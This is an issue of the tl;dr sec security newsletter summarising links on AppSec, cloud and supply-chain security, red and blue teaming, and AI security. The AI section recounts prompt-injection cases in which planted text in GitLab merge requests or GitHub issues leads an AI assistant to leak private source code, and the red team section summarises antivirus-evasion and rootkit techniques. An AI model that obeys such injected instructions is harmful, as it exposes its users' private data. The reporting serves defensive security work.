tl;dr sec
Posts
[tl;dr sec] #281 - Free AI Red Teaming Labs, Cloud Security Roadmaps, o3 Finds 0-day

[tl;dr sec] #281 - Free AI Red Teaming Labs, Cloud Security Roadmaps, o3 Finds 0-day

Free Black Hat training by Microsoft's AI red team, a cloud security roadmap for your start-up, o3 finds an 0-day in the Linux kernel’s SMB implementation

Clint Gibler
May 29, 2025

Hey there,

I hope you’ve been doing well!

🤔 Birthday Reflections

In a few weeks it’ll be my birthday!

Every year, on New Years and/or my birthday, I feel the urge to write a reflection about how the year went, thoughts on the future, etc.

And almost without fail I never actually do it 😅

But this time I’m (mostly) optimistic I will!

If there’s anything you’d be curious to hear about, just respond to this email 💌

Currently I’m thinking the rough structure will be something like reflections/lessons learned across Semgrep (day job), tl;dr sec (night/weekend job), and personal life (theoretical).

Feel free to let me know what you’d be curious to know more about 🫡

Sponsor

📣 Bridge the Visibility Gaps in Google Workspace Security

Your cloud workspace isn’t just another app. It’s the heart of your business and it deserves purpose-built protection. Material was built from the ground up to secure Google Workspace and Microsoft 365, recognizing that your most valuable data lives in Gmail, Drive, and shared accounts, not on endpoints. Unlike legacy tools awkwardly adapted from perimeter security, Material delivers integrated, real-time defense that closes the visibility gaps between email, files, and identity. Don’t protect your cloud with tools meant for something else. Secure it with Material.

👉 See Purpose-Built Security in Action 👈

Material has some cool features! I like the customizability, how you can redact sensitive info in old Google Workspace emails/docs/etc., and generally get visibility into your cloud workspace 🤘

AppSec

High Leverage Security Decisions
Dade discusses key security decisions for early-stage startups to minimize long-term risks and ease future audits. He recommends adopting an identity provider (like Google Workspace, Okta, or Microsoft Entra ID) early for centralized access management and SSO, enforcing hardware security keys for phishing-resistant MFA, using infrastructure as code (e.g. Terraform/OpenTofu) for version control and peer review of changes, leveraging managed cloud services, and implementing an MDM solution for device management.

Security Is Just Engineering Tech Debt (And That's a Good Thing)
Srajan Gupta argues that security should be treated as regular engineering work, not a separate discipline, and be treated like engineering tech debt. He advocates for integrating security into standard engineering processes by:

Threat modeling during design: don’t separate security requirements from functional requirements.
Including security metrics in observability stacks: your app’s security telemetry should be in the same dashboard as the signals for performance, reliability, business metrics.
Measuring security debt like you measure other tech debt, including their impact on velocity, reliability, and maintenance costs.
Using the same incident response procedures for all issues.

Starting a Security Program from Scratch (or re-starting)
Excellent post by Phil Venables outlining a 16-step framework for building or rebuilding a security program across four phases:

Face the Right Direction: Put someone in charge, establish a governance/oversight process, conduct a critical systems security/breach test, address high risks immediately.
Cover the Basics : Perform a broad security review against frameworks like NIST Cyber Security Framework and CIS Critical Controls, develop a multi-stage implementation plan to close gaps, select managed service providers to help, build a team.
Make it Routine/Sustainable: Program manage your enhancements, establish continuous risk assessment and control monitoring, increase resilience through scenario planning, and consider risk transfer options like cyber insurance.
Make it Strategic: Align security with business objectives, extend security capabilities to support customers/products, improve team skills, and conduct red team exercises.

Sponsor

📣 AI Is Writing Code—But Can It Secure It?

Hype vs. Reality

With the rise of tools like GitHub Copilot and Cursor, security teams are racing to keep up. AI-native security tools promise to help—but are they ready for production? In this new 2025 report, Latio Tech puts top AI security vendors to the test against real-world code vulnerabilities. See who detects, who fixes, and who falls short. Normally paywalled, Amplify Security is offering the full report free for a limited time.

👉 Get the Free Report 👈

Nice, AI auto-fixing code is a super hot area, I’ve been waiting to see a comparison of a bunch of people’s approaches 🤘

Cloud Security

silverhack/monkey365
By Juan Garrido Caballero: A tool for security consultants to easily conduct not only Microsoft 365, but also Azure subscriptions and Microsoft Entra ID security configuration reviews.

macalbert/envilder
By Marçal Albert: A CLI that securely centralizes your environment variables from AWS SSM as a single source of truth.

Hunting for Bucket Traversals in Google's Client Libraries
Jakub Domeracki describes a bucket traversal vulnerability he found in Google's Cloud Storage Python client library, which would allow an attacker to supply a blob name like ../bucket/object to upload files to unintended buckets, potentially leading to overwriting existing files or having the object later consumed by the application in a dangerous way (config override, XSS, etc.).

Setting Up a Cloud Security Roadmap for Your Startup
Chandrapal Badshah provides a practical guide for startups to create an effective cloud security roadmap. He outlines key questions to consider (cloud platforms used, top security priorities, relevant cloud services, and scope), compares existing AWS security roadmaps (by Scott Piper, Marco Lancini, and AWS), and offers tips for customization. Key advice: align the roadmap with business objectives, prioritize based on your startup's specific risks, prioritize fundamental controls, include both preventive and detective controls, regularly review and update the plan.

Supply Chain

Renovate: Could you please bump that version?
Sebastian Poxhofer shows how to use Renovate's new Generic Version Bump feature, which allows bumping semantic versions in files based on changes in other files, even if they're not directly related. The post includes an example of automatically updating Helm chart versions when the appVersion changes. This feature works with any file format and can be triggered by package file or lock file changes.

💡 Anything that makes patching easier or automatic is 👌 in my book.

Demonstrably Secure Software Supply Chains with Nix
Nixcademy’s Jacek Galowicz shows how Nix can be used for software supply chain integrity (e.g. for regulatory compliance) by following a process that proves that the final binary was derived solely from trusted sources, including all dependencies and build tools. The process involves using Nix to build a complete dependency tree, extracting all fixed-output derivations (source packages), exporting them to an offline system, and rebuilding everything from scratch. See this GitHub repo for an example implementation.

Commit Stomping
Andy Gill describes “Commit Stomping”: using legitimate git features to alter commit timestamps, which can mislead observers, allowing an attacker to introduce malicious code while making incident response and constructing a forensic timeline more difficult. Andy describes how Commit Stomping can be done, via environment variables like GIT_AUTHOR_DATE and GIT_COMMITTER_DATE and commands like git rebase, git commit —amend, or git filter-branch.

The post ends with a nice discussion of potential defenses: require and verify signed commits, capture commit metadata on ingest, use mirrored repos with immutable storage, lock down history rewriting, and monitor for anomalous patterns.

Blue Team

kunai-project/kunai
By Kunai Project: A threat hunting tool for Linux leveraging eBPF for kernel-level event monitoring. Like Sysmon for Windows. Written in Rust.

Leveraging Sysmon to Complement EDR and Address Evasion Techniques
Siddhant Mishra discusses a number of specific EDR evasion techniques and how to detect them with Sysmon, including: kernel hooking and unhooking, direct syscall injections, DLL unhooking, memory manipulation with process hollowing, and Asynchronous Procedure Call (APC) injection.

Rude Awakening: Unmasking Sleep Obfuscation With TTTracer
Felix Mehta describes how to use TTTracer, a WinDBG component pre-installed on modern Windows, and Time Travel Debugging to defeat sleep obfuscation techniques used by modern malware (basically sleeping to avoid analysis). He demonstrates capturing a full execution trace of a Havoc implant, then using WinDBG to analyze the trace and extract the decrypted implant and configuration. This approach can potentially retrieve decrypted payloads and track malware activities more effectively than traditional memory dumps.

Red Team

carloslack/KoviD
A Linux kernel rootkit with features including: self-hiding from SysFS, reverse shell backdoors, hiding processes/files, evading detection through Ftrace-based syscall hijacking and port-knocking, and more.

Evading Defender With Python And Meterpreter Shellcode: Part 1
infosecfacts describes a technique for running Meterpreter shellcode while evading Windows Defender and other AVs by translating a basic C shellcode loader to Python using ctypes, which allows interacting with Win32 API endpoints. When tested against 8 security products, only Bitdefender blocked it completely. The post also provides a basic Elastic EDR detection rule and discusses future improvements like encrypting the shellcode and decrypting it in memory and sandbox evasion techniques.

Attacking EDRs Part 4: Fuzzing Defender's Scanning and Emulation Engine (mpengine.dll)
InfoGuard’s Manuel Feifel describes fuzzing Microsoft Defender’s scanning and emulation engine mpengine.dll, finding multiple out-of-bounds read and null dereference bugs using Snapshot Fuzzing with WTF, as well as kAFL/NYX and Jackalope. These bugs can be used to crash the main Defender process as soon as the file is scanned: a malicious file could be delivered alongside an initial access payload to kill Defender before the payload executes, allowing subsequent malicious actions without detection or prevention. The bugs do not appear to be exploitable for code execution. See also:

Part 1: gives an overview of the attack surface of EDR software and describes the process for analyzing drivers from the perspective of a low-privileged user.
Part 2 describes the results of the EDR driver security analysis.
Part 3 describes a DoS vulnerability affecting most Windows EDR agents.

AI + Security

microsoft/AI-Red-Teaming-Playground-Labs
This repo contains the challenges for the labs that were used in the course “AI Red Teaming in Practice,” originally taught at Black Hat USA 2024 by Dr. Amanda Minnich, Gary Lopez, and Martin Pouliot. There are 12 challenges ranging from credential exfiltration, extracting a secret from the metaprompt, indirect prompt injection, and more!

From idea to (secure) app: Semgrep + Replit
Announcing the Semgrep 🫶 Replit partnership. Now Replit users can turn on the new pre-deployment scanning feature, which lets Replit Agent run a Semgrep scan to automatically find security issues via a curated set of Python, Javascript, and Typescript rules.

💡 Semgrep is also having a Spring Release webinar to discuss the roughly one million new features shipped recently.

Remote Prompt Injection in GitLab Duo Leads to Source Code Theft
Legit Security’s Omer Mayraz describes how GitLab Duo, GitLab’s AI Assistant, was vulnerable to prompt injection in merge request (MR) descriptions and comments, commit messages, issue descriptions and comments, and source code.

A prompt injection that injects untrusted HTML into Duo’s responses (e.g. img tags) could be used to exfiltrate private source code the victim has access to, sensitive issue data (e.g. vulnerabilities), etc.

GitHub MCP Exploited: Accessing private repositories via MCP
Invariantlabs’ Marco Milanta and Luca Beurer-Kellner describe basically the same vulnerability: a malicious GitHub Issue could cause the GitHub MCP integration to leak sensitive info about a user’s private repos.

💡 The discussion towards the bottom of a) implementing runtime guardrails of acceptable tool call patterns / context-aware access controls and b) auditing agent <> MCP interactions is pretty interesting. People have identified this is a problem, but solutions are still quite nascent, so it’ll be neat to see how this sorts out.

How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation
Sean Heelan describes using OpenAI's o3 model to find a zero-day use-after-free vulnerability with nothing more complicated than the o3 API – no scaffolding, no agentic frameworks, no tool use. The vulnerability it found requires reasoning about concurrent connections to the server, and how they may share various objects in specific circumstances.

Sean also describes testing o3 on a prior vulnerability he found, and the context he gave to the LLM to reason about (a ‘session setup’ command handler + the code for all the functions it calls, up to a call depth of 3), along with the prompts used and code analyzed.

“The main takeaway from this post is this: with o3 LLMs have made a leap forward in their ability to reason about code, and if you work in vulnerability research you should start paying close attention.”

💡 I love the thoughtful methodology and that Sean shared the supporting artifacts (prompts, code targeted, etc.). Clearly this is a promising area of research. What’s also important here, that I don’t see most “AI + AppSec” companies talking about, is: how reliable are LLMs in detecting the same bug?

“o3 finds the kerberos authentication vulnerability in the benchmark in 8 of the 100 runs. In another 66 of the runs o3 concludes there is no bug present in the code (false negatives), and the remaining 28 reports are false positives.”

Misc

Meet the Secret Strategist Behind Alex Hormozi and GaryVee
Jay Clouse interviews Caleb Ralston. Wow, Caleb is a thoughtful dude 🤯 I really like his Brand Journey Framework, which takes you from your goal → what to do today. Start with the end in mind.

Goal - What is the outcome I want? Why am I doing this?
What would I have to be known for for that to happen?
What do I have to do in order to be known for the thing, in order for the outcome I desire to occur?
In order to do those things, what do I have to learn? (today)

So (today) what do I have to learn → in order to do the things → to be known for the things → so that my desired outcome occurs.

Misc

"The show doesn't go on because it's ready, it goes on because it's 11:30" - Lorne Michaels on SNL. Amanda Goetz tweet on getting things done by creating a deadline and telling people publicly. Personally, I’ve found external accountability and deadlines more effective than personal motivation 😅
Pieter Levels on visiting OpenAI, and reflections on SF/Silicon Valley culture
Thread: Could a government seize domain names?
Tyler Tringas: Reflections on the Delaware legal system (bad for defendants), using LLMs for legal help, and tips on reviewing your business insurance coverage
Life is Short - Enter your date of birth and expected life expectancy, and this page will show you your days, weeks, months, and years lived vs remaining.
The daily routine of Julie Clark, the 56-year-old whose biological age clocks in at 36, with a much more minimal approach than Bryan Johnson
Andrej Karpathy’s append-and-review note approach - A single Apple Note text file, new ideas or TODOs are appended to the top.
The Onion - 213 Killed In How Do You Pronounce That?

Politics

Mysterious hacking group Careto was run by the Spanish government, sources say
Russia to enforce location tracking app on all foreigners in Moscow, providing authorities with real-time location, fingerprints, and facial photos.
The current U.S. administration wants to amp up offensive cyberattacks against China and other geopolitical rivals, while reducing defensive headcount at CISA and elsewhere. Sounds risky to me.
Phone companies failed to warn senators about U.S. government surveillance on Senate-issued devices. The U.S. gov’t surveilling policy makers sounds like something you’d read about for a third-world dictatorship 🫠
The United Arab Emirates received permission from the Pentagon to recruit former members of the U.S. Defense Digital Service displaced by DOGE to work on AI for the UAE military — despite warnings from US spy agencies and federal lawmakers that UAE could share AI technologies with China.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler